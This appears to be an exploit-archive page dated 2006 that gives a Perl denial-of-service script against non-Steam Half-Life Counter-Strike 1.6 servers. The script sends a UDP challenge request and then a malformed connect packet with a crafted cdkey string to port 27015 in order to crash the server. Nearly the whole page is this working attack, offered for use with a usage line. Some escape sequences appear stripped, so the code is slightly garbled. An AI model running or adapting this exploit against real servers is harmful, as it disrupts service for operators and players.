Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit
# Published : 2006-02-11
# Author : Firestorm
# Previous Title : D-Link Wireless Access Point (Fragmented UDP) DoS Exploit
# Next Title : Microsoft HTML Help Workshop (.hhp file) Denial of Service

#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{       econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
        my $host=$_[0];
        my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
        die "Could not create socket: $!n" unless $sock;
        $cmd="xffxffxffxff";
        syswrite $sock, $cmd."getchallenge";

        sysread $sock,$b,65535;  print $b,"n";
        @c=split(/ /,$b);

        $c2=$c[1];

        $q=$cmd."connect 47 $c2 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a36258af1bb64ed866538c9db76""\"";
print '>',$q,"n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"n";
sleep 3;
close $sock;
}

# www.Syue.com [2006-02-11]